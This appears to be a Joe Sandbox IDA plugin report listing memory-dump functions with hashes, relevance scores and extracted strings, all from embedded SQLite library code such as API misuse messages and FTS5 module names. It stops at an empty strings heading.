Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: a7c6450feab03eea0a3aec5cd98635059b271a514bc721f20e08f22ea2528fa8
Instruction ID: 1e304e2e6ce104e345ddc2613e8e70802e09d7832dcd0d7edfa6b08d2ddee162
Opcode Fuzzy Hash: a7c6450feab03eea0a3aec5cd98635059b271a514bc721f20e08f22ea2528fa8
Instruction Fuzzy Hash: 5E617875A08381ABEF21AE24AC80F7777A89F81639F14486AFD5586653F321E144C7F3

Function 1D753A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

cannot delete, xrefs: 1D753A82
bad page number, xrefs: 1D753BE3
bad page value, xrefs: 1D753BDC
no such schema, xrefs: 1D753BEA
cannot insert, xrefs: 1D753BF1, 1D753C52
read-only, xrefs: 1D753A71

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 59d1bab4fd4422e3b83d861b8715c932c8bd8a89ad61ecda0f340e530ae4f751
Instruction ID: 5fe5689a7454885fac4a7560a52b572fb82eda5b2ca53ee9dbccadbaf549cb7e
Opcode Fuzzy Hash: 59d1bab4fd4422e3b83d861b8715c932c8bd8a89ad61ecda0f340e530ae4f751
Instruction Fuzzy Hash: 5A51F275A083019BDB01CF18DD85B2677B4AF40275F15856EFC498F262E736E845CBA3

Function 1D769100 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 161COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D769148
API called with NULL prepared statement, xrefs: 1D76910D
API called with finalized prepared statement, xrefs: 1D769122
%s at line %d of [%.10s], xrefs: 1D76914D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D76913E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 389017462451b9a547abfa98212a82bcc80eb2adcbf029444203379875801b69
Instruction ID: 39bdea09f5d91f6189c419cc76557d6edfa58ffdd4865698d4ef29d242f2ea3f
Opcode Fuzzy Hash: 389017462451b9a547abfa98212a82bcc80eb2adcbf029444203379875801b69
Instruction Fuzzy Hash: B84146B5A08741ABF7058E24DC88BEB37D5AB89234F25043EED598B342F725E50583B3

Function 1D878340 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 145COMMON

Download Yara Rule

Strings

unopened, xrefs: 1D8783BD
misuse, xrefs: 1D878387
API call with %s database connection pointer, xrefs: 1D87836E
NULL, xrefs: 1D878369
%s at line %d of [%.10s], xrefs: 1D87838C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D87837D
invalid, xrefs: 1D8783B6

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: c799cc3ff63c9af9c985eda359ca902520084e42f4a7489bf592ac161cea41dc
Instruction ID: df913e8797062a2efedbbcb4c6da568fd52642108f6bb426059552514b18a78a
Opcode Fuzzy Hash: c799cc3ff63c9af9c985eda359ca902520084e42f4a7489bf592ac161cea41dc
Instruction Fuzzy Hash: FC415770A18340ABD7109E2CDC84FBB7BB9AF85B15F48456DF9895B342E779D00483A3

Function 1D86B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

unopened, xrefs: 1D86B145
misuse, xrefs: 1D86B112
API call with %s database connection pointer, xrefs: 1D86B0F9
NULL, xrefs: 1D86B0F4
%s at line %d of [%.10s], xrefs: 1D86B117
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D86B108
invalid, xrefs: 1D86B13E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: 62c3c50cbeaddb718bd20911a37aea0a200bf0dff23392c9d0e6a62fef6c7080
Instruction ID: 27389841f6dbeb9bd46ed31cdffddb9763606d3d5d4755cb918aaa645aa9caa8
Opcode Fuzzy Hash: 62c3c50cbeaddb718bd20911a37aea0a200bf0dff23392c9d0e6a62fef6c7080
Instruction Fuzzy Hash: 72314475508389FBD7115E64EC44AAB7BA9AF8533DF00053DFAA963202E761F60583B3

Function 1D766F30 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D766F6A
API call with %s database connection pointer, xrefs: 1D766F54
%s at line %d of [%.10s], xrefs: 1D766F6F
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D766F60
invalid, xrefs: 1D766F4F
bad parameter or other API misuse, xrefs: 1D766F7E
out of memory, xrefs: 1D766F39, 1D766FA0

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$bad parameter or other API misuse$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$out of memory
API String ID: 0-2911740470
Opcode ID: 4ba2169d652c3a6ea4adcc23e9ba93e11a82a1c8ae044c424230ae59d4d4058a
Instruction ID: 74706a77d2dfe3a555a66ad09f87c02ac748fc964285f55aec14eaa173874b80
Opcode Fuzzy Hash: 4ba2169d652c3a6ea4adcc23e9ba93e11a82a1c8ae044c424230ae59d4d4058a
Instruction Fuzzy Hash: 12214D7550475097FB154634EC40BEF23626BC0735FA985EEE8965B202F635E846C2B3

Function 1D7506F0 Relevance: 15.2, APIs: 10, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c40e496c3aff61437956149967fec98c6dbe6a698902377ff0717288e737b2
Instruction ID: 90cd40d56d13ffc5537ae6071c8341d4df9f97080eac20eed5e8c99943b02a3d
Opcode Fuzzy Hash: e0c40e496c3aff61437956149967fec98c6dbe6a698902377ff0717288e737b2
Instruction Fuzzy Hash: 7C7145B59043229BDB06DF14D880A6A73E0BF84324F0505AEED899B302E336F945CBD3

Function 1D816380 Relevance: 15.1, APIs: 10, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0640b8dba20917e98818fe418486ab48af230ba8a74965999d23d4fe04e216
Instruction ID: c7a31c01fb9d89848a07ba8fb785400a3b18706235f489d585c26a166b930234
Opcode Fuzzy Hash: 0e0640b8dba20917e98818fe418486ab48af230ba8a74965999d23d4fe04e216
Instruction Fuzzy Hash: 21418174408620EFC7105B65DCCDB2677B8BF016AEF010628F986A6621DB35F458CF63

Function 1D78F4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: b7fe9794bb8bca01ab775c77cc60b26cf67abfbc4c2de3222137f5f1376583da
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: DC21D8BB90C25237E302AA206C06FBFB39C5F51236F464556FF18A2052F724E60583A3

Function 1D74E170 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 445COMMON

Download Yara Rule

Strings

snippet, xrefs: 1D7C1200
fts5_source_id, xrefs: 1D7C148D, 1D7C14E0
porter, xrefs: 1D7C12BF
unable to delete/modify user-function due to active statements, xrefs: 1D7C13BF, 1D7C14B8
fts5vocab, xrefs: 1D7C1340
fts5, xrefs: 1D7C1053, 1D7C1395, 1D7C13E7
unicode61, xrefs: 1D7C1279, 1D7C130F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: fts5$fts5_source_id$fts5vocab$porter$snippet$unable to delete/modify user-function due to active statements$unicode61
API String ID: 0-2986783930
Opcode ID: cf563f26a3f02fa8a0066287fc93d50ccf34b79811b78bc138f32816e838d9c9
Instruction ID: 391ce8feffa69de7b29c0afcba45f8ac468a4798e565d5547ec34d6cc2089c97
Opcode Fuzzy Hash: cf563f26a3f02fa8a0066287fc93d50ccf34b79811b78bc138f32816e838d9c9
Instruction Fuzzy Hash: CFF19EB0504702AFD7019F24EC89B2B7BB4BF417A4F01463AED4A9B241E775E654CBA3

Function 1D84FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D84FBA0
API called with NULL prepared statement, xrefs: 1D84FB65
API called with finalized prepared statement, xrefs: 1D84FB7A
%s at line %d of [%.10s], xrefs: 1D84FBA5
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D84FB96

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 223c30f72c7949f882983f5e48a9f91b3dbbbc23188e3268fe1ee460df065703
Instruction ID: a727ca3feabb9c25be398bac77aeb0544aa0cca32bf2b1a70eb6ae49a3c2302f
Opcode Fuzzy Hash: 223c30f72c7949f882983f5e48a9f91b3dbbbc23188e3268fe1ee460df065703
Instruction Fuzzy Hash: AFB1E1B69047499FE7208F34DC4CB2777E4BF45319F21892CE98A8B242E775E4058BA3

Function 1D7C1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

%z, %Q HIDDEN, %s HIDDEN), xrefs: 1D7C1831
rank, xrefs: 1D7C1824
%z%s%Q, xrefs: 1D7C180D
CREATE TABLE x(, xrefs: 1D7C17D9

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 3d29d1c3e853fdc8f14248c39732f67c15b3896d39b8b3ae7fbbf40011a4c3a9
Instruction ID: 390b3e57ed31a08f71f46b857851b1308bd94286c3e0e3537b5baf67cb86b8e9
Opcode Fuzzy Hash: 3d29d1c3e853fdc8f14248c39732f67c15b3896d39b8b3ae7fbbf40011a4c3a9
Instruction Fuzzy Hash: B881DF71A08252AFDB009F24EC84B6AB7E4FF453A5F05076AFD45A7221D735E810CBA3

Function 1D78E320 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D78E380
API called with finalized prepared statement, xrefs: 1D78E36A
%s at line %d of [%.10s], xrefs: 1D78E385
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D78E376

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3620335220
Opcode ID: 55103e623d8c4bf8a485858d49f04c73da17fc738bd0a4364fbecdc9aae9a004
Instruction ID: 0958fa7337932dde711c08d81f870898ad742d58688ff6d5746b5a2df826fd71
Opcode Fuzzy Hash: 55103e623d8c4bf8a485858d49f04c73da17fc738bd0a4364fbecdc9aae9a004
Instruction Fuzzy Hash: 90519370908611EBEB019F24DCC8B6A3774AF023AAF058566FD099B252D736E554CFA3

Function 1D8374A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D8374D7
API call with %s database connection pointer, xrefs: 1D8374C1
unable to close due to unfinalized statements or unfinished backups, xrefs: 1D8375D1
%s at line %d of [%.10s], xrefs: 1D8374DC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D8374CD
invalid, xrefs: 1D8374BC

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: d9a5d75cfd85add4a95580dd1b8cf5f457557cad33a6db2bbfc20a8623b81834
Instruction ID: c9941a259d20c3c97ecefaa7611962f017da14a269339bda7b423913b6bb5792
Opcode Fuzzy Hash: d9a5d75cfd85add4a95580dd1b8cf5f457557cad33a6db2bbfc20a8623b81834
Instruction Fuzzy Hash: 16513875904711BBDB11AB28EC88B7B77A5AF81316F050528F99E93202F734F552CAE3

Function 1D7DBCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

